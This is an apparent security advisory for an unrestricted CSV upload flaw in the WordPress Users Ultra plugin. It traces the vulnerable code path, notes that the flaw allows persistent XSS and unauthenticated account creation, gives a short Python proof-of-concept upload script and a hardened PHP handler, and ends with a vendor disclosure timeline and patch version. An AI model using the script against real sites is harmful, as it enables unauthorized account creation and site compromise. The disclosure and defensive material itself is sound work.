Date: Tue, 17 Nov 2015 17:43:22 GMT
Subject: WordPress Users Ultra Plugin [Unrestricted File Upload]

* Exploit Title: WordPress Users Ultra Plugin [Unrestricted File Upload]
* Discovery Date: 2015/10/27
* Public Disclosure Date: 2015/12/01
* Exploit Author: Panagiotis Vagenas
* Contact:
* Vendor Homepage:
* Software Link:
* Version: 1.5.50
* Tested on: WordPress 4.3.1
* Category: webapps


The WordPress plugin `Users Ultra Plugin` suffers from an unrestricted file upload vulnerability.

Any user (registered or not) can exploit a misbehavior of the plugin in order to upload CSV files to the affected website. Although the plugin checks the file extension against an extension whitelist (in this case only csv files are whitelisted), no other checks (MIME type, size, etc.) take place. This alone can expose the affected website to a variety of attacks; see OWASP Unrestricted File Upload to get an idea.


The plugin workflow that could allow a malicious user to exploit this misbehavior is as follows:

1. Upon initialization of the plugin (at any time, as long as it is activated) an instance of the `XooUserUser` class is created.
2. The constructor of the `XooUserUser` class checks for the POST variable `uultra-form-cvs-form-conf`
    (file `wp-content/plugins/users-ultra/xooclasses/xoo.userultra.user.php`, lines 19-23):

    if (isset($_POST['uultra-form-cvs-form-conf'])) 
        /* Let's Update the Profile */

3. Assuming the POST variable `uultra-form-cvs-form-conf` has been set in the request, the method `XooUserUser::process_cvs()` is called.
4. The `XooUserUser::process_cvs()` method processes every file in the `$_FILES` super-global, checking only that the file has a `csv` extension.

In addition we mark the following points:

1. A malicious user can create and activate user accounts by exploiting this vulnerability if `$_POST["uultra-activate-account"]` is set to `active`
2. A welcome email is sent if `$_POST["uultra-send-welcome-email"]` is set to 1
3. The CSV files uploaded to the server are stored in a directory (`wp-content/usersultramedia/import` by default) accessible by anyone
4. Any additional columns present in the CSV file are stored in `usermeta`
5. Values in the CSV file are not sanitized, which can easily lead to a persistent XSS attack, so an attacker can compromise the whole site
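
A hardened import handler that addresses the workflow and the points above, as an added example and not the plugin's code or the vendor's patch. It assumes a hypothetical `uu_handle_csv_import()` function, a `uu_csv_import` action and nonce, a `uu_csv` form field and a 1 MiB size cap.

```php
<?php
// Hypothetical handler: the function name, the 'uu_csv_import' action/nonce,
// the 'uu_csv' field and the 1 MiB cap are assumptions, not Users Ultra code.
// admin_post_{action} only fires for logged-in users, unlike a check made in
// a constructor that runs on every request.
add_action( 'admin_post_uu_csv_import', 'uu_handle_csv_import' );

function uu_handle_csv_import() {
    // Require a capability and a nonce before touching the upload.
    if ( ! current_user_can( 'create_users' ) ) {
        wp_die( 'Not allowed', '', array( 'response' => 403 ) );
    }
    check_admin_referer( 'uu_csv_import' );

    // Accept one named field instead of looping over all of $_FILES.
    $file = isset( $_FILES['uu_csv'] ) ? $_FILES['uu_csv'] : null;
    if ( ! $file || UPLOAD_ERR_OK !== $file['error']
        || ! is_uploaded_file( $file['tmp_name'] ) || $file['size'] > 1048576 ) {
        wp_die( 'Invalid upload', '', array( 'response' => 400 ) );
    }
    // Check extension and detected type together. CSV is plain text, so this
    // cannot prove the content is harmless; the per-field cleaning below does.
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'], array( 'csv' => 'text/csv' ) );
    if ( 'csv' !== $check['ext'] ) {
        wp_die( 'Only CSV files are accepted', '', array( 'response' => 400 ) );
    }

    // Parse the PHP temp file in place: nothing is stored under the web root.
    $fh = fopen( $file['tmp_name'], 'r' );
    if ( false === $fh ) {
        wp_die( 'Cannot read upload', '', array( 'response' => 500 ) );
    }
    fgetcsv( $fh ); // skip the header row
    while ( false !== ( $row = fgetcsv( $fh ) ) ) {
        $login = sanitize_user( isset( $row[0] ) ? $row[0] : '', true );
        $email = sanitize_email( isset( $row[1] ) ? $row[1] : '' );
        if ( '' === $login || ! is_email( $email ) ) {
            continue; // reject rows without a usable login and address
        }
        // Columns beyond the known ones are dropped, never copied to usermeta,
        // and account status is not taken from request parameters.
        wp_insert_user( array(
            'user_login'   => $login,
            'user_email'   => $email,
            'display_name' => sanitize_text_field( isset( $row[2] ) ? $row[2] : '' ),
            'user_pass'    => wp_generate_password(),
        ) );
    }
    fclose( $fh );
}
```

Values that still reach a template must also be escaped on output (for example with `esc_html()`), since input cleaning alone does not cover data already stored.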


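The following Python3 script forms a CSV file and uploads it to a site:

    import requests
    import csv
    import tempfile

    # URL of the WordPress site under test
    url = ''

    # POST fields that trigger the import in the XooUserUser constructor
    postData = {
        'uultra-form-cvs-form-conf': 1,
        'uultra-send-welcome-email': 1,
        'uultra-activate-account': 'pending'
    }

    csvFileHeader = ['user name', 'email', 'display name', 'registration date', 'first name', 'last name', 'age', 'country']
    csvFileRow = ['userName', '', 'User Name', '1/1/1', 'User', 'Name', '100', 'IO']

    # Build the CSV in a temporary file that carries the .csv extension
    csvFile = tempfile.NamedTemporaryFile(mode='a+t', suffix='.csv')

    wr = csv.writer(csvFile, quoting=csv.QUOTE_ALL, delimiter=',')
    wr.writerow(csvFileHeader)
    wr.writerow(csvFileRow)
    csvFile.seek(0)  # rewind so the upload reads the file from the start

    files = {'file.csv': csvFile}

    r = requests.post(url, data=postData, files=files)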



2015/10/29 - Vendor notified via email
2015/11/11 - Vendor notified via contact form on his website
2015/11/13 - Vendor notified via support forums at
2015/11/14 - Vendor responded and received report through email
2015/11/15 - Vendor responded
2015/11/15 - Patch released


Update to version 1.5.59
